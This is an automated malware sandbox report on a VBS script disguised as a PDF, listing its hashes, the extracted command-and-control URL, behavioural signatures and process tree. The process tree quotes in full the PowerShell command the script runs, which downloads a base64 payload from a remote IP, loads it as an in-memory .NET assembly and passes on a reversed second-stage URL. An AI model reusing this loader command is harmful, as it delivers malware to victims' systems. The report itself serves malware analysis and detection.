Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
24-12-2024 10:35
Static task
static1
Behavioral task
behavioral1
Sample
URFT06GSBAWRP_001_PDF/RQK02HVBPO_002_PDF.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
URFT06GSBAWRP_001_PDF/RQK02HVBPO_002_PDF.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
URFT06GSBAWRP_001_PDF/URFT06GSBAWRP_001_PDF.exe
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
URFT06GSBAWRP_001_PDF/URFT06GSBAWRP_001_PDF.exe
Resource
win10v2004-20241007-en
General
-
Target
URFT06GSBAWRP_001_PDF/RQK02HVBPO_002_PDF.vbs
-
Size
219KB
-
MD5
86d9cdbe85e0b345c00063cb59efda75
-
SHA1
6990625fff03cdc505a7c9a224c39fb9c1b1ab80
-
SHA256
541752eae29c171bb8ab3f5851b6f58ba58035298b8781990998d22cd4982f6e
-
SHA512
0f39d5b741cb5fc822f17306537a4659c5ff191f18ef47e18aa3f604eb9d4598f1c01316068285531916a57bd0410b27fd8d44adb3bda41ee691098cd5b1bc2f
-
SSDEEP
48:DVK0hbQvuivLvyvTxYvsvuiv7vu2vJR2vFvvvfv1KvFvDv2UfHvrvUvgYvc2vGgu:xKWdUIlVc8WGvXimF
Malware Config
Extracted
http://20.7.14.99/dll/dll_ink.pdf
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2680 powershell.exe -
pid Process 2680 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2680 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2680 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2232 wrote to memory of 2680 2232 WScript.exe 30 PID 2232 wrote to memory of 2680 2232 WScript.exe 30 PID 2232 wrote to memory of 2680 2232 WScript.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\URFT06GSBAWRP_001_PDF\RQK02HVBPO_002_PDF.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('9a82ea0d2fb5-1179-4854-75ce-8a89ca37=nekot&aidem=tla?txt.cnysay/o/moc.topsppa.483ca-dpoj/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2680
-